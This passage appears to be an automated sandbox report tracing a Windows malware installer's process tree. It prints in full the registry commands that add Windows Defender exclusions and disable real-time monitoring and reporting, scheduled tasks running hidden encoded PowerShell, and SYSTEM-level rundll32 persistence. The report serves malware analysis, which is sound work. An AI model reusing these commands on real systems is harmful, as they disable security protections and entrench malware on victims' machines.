33 PID 868 wrote to memory of 268 868 Install.exe 33 PID 868 wrote to memory of 268 868 Install.exe 33 PID 868 wrote to memory of 268 868 Install.exe 33 PID 868 wrote to memory of 268 868 Install.exe 33 PID 868 wrote to memory of 268 868 Install.exe 33 PID 868 wrote to memory of 268 868 Install.exe 33 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 1932 wrote to memory of 1516 1932 forfiles.exe 35 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 268 wrote to memory of 932 268 forfiles.exe 36 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 932 wrote to memory of 1592 932 cmd.exe 38 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 280 1516 cmd.exe 37 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 1516 wrote to memory of 1780 1516 cmd.exe 39 PID 932 wrote to memory of 1684 932 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\7zSE65A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\7zSF2F7.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:280
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1780
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:932 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1592
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1684
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guncWJnXg" /SC once /ST 08:01:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guncWJnXg"4⤵PID:2032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guncWJnXg"4⤵PID:1440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\SxTZwTC.exe\" JF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1912
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6321A86C-D95D-41A0-B3CE-2855C47AA1A2} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:1744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1348
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1808
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1664
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1584
-
C:\Windows\system32\taskeng.exetaskeng.exe {12E740C8-4192-4D9A-AB1E-E483523D5507} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\SxTZwTC.exeC:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\SxTZwTC.exe JF /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1152 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxjaJkgdS" /SC once /ST 01:41:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxjaJkgdS"3⤵PID:712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxjaJkgdS"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1272
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1440
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:316
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmQwwHoDL" /SC once /ST 10:45:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmQwwHoDL"3⤵PID:320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmQwwHoDL"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:323⤵PID:1808
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:643⤵PID:936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:323⤵PID:1768
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:324⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:643⤵PID:1268
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:644⤵PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\PtFLChdTWFkbMOwK\KyAiYgcd\PsrwjLOmJmzhqkYq.wsf"3⤵PID:1500
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\PtFLChdTWFkbMOwK\KyAiYgcd\PsrwjLOmJmzhqkYq.wsf"3⤵
- Modifies data under HKEY_USERS
PID:268 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hfmUoVlnDXXxKeVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hfmUoVlnDXXxKeVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:324⤵PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:644⤵PID:576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:324⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:644⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:324⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:644⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:324⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:644⤵PID:828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:324⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:644⤵PID:776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hfmUoVlnDXXxKeVB" /t REG_DWORD /d 0 /reg:324⤵PID:1396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hfmUoVlnDXXxKeVB" /t REG_DWORD /d 0 /reg:644⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR" /t REG_DWORD /d 0 /reg:324⤵PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR" /t REG_DWORD /d 0 /reg:644⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:324⤵PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PtFLChdTWFkbMOwK" /t REG_DWORD /d 0 /reg:644⤵PID:860
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjBQHLjKH" /SC once /ST 05:25:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjBQHLjKH"3⤵PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjBQHLjKH"3⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:704
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:784
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1756
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wLvsIRnBfEcGhlAOV" /SC once /ST 11:24:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\XepbKYx.exe\" 0b /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wLvsIRnBfEcGhlAOV"3⤵PID:1936
-
-
-
C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\XepbKYx.exeC:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\XepbKYx.exe 0b /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKFjthDDlmdmBdSpYV"3⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1612
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1564
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2000
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CrVpqlWoU\SWUpCz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gJECdJUNuqvNlNQ" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJECdJUNuqvNlNQ2" /F /xml "C:\Program Files (x86)\CrVpqlWoU\AJxMqTE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gJECdJUNuqvNlNQ"3⤵PID:1580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJECdJUNuqvNlNQ"3⤵PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zMXAekEoOFzMiq" /F /xml "C:\Program Files (x86)\lVrlTdgfhXOU2\RAJmKwI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzmbNextDjATo2" /F /xml "C:\ProgramData\hfmUoVlnDXXxKeVB\rOTQLxG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CPJtugmqbghMWscDr2" /F /xml "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\ZAxiNMW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1980
-
-
